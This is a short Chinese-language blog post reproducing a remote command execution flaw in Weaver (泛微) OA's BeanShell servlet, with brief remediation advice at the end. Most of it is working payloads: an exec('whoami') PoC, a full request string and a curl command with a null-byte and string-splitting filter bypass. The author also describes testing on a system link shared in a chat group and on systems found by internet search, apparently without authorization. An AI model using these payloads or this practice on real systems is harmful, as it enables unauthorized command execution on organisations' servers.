30

0x00 前言

最近泛微OA系统爆发出0day漏洞,通杀<=9.0的系统,本次复现一下漏洞

0x01 复现

昨天群里面大佬发了一个泛微OA系统的连接,本来作为本次复现的一个环境

漏洞地址:/weaver/bsh.servlet.BshServlet/

漏洞页面如下

poc:exec("whoami");

直接执行了whoami命令

执行ipconfig命令

在土司看见大佬们其他的poc

bsh.script=exec("whoami");&bsh.servlet.captureOutErr=true& bsh.servlet.output=raw&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw
curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

这个poc暂时没用过,根据关键字在网上找了一下泛微的OA系统,小部分可以直接执行命令,是一个危害挺大的漏洞。

0x02 漏洞修复

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp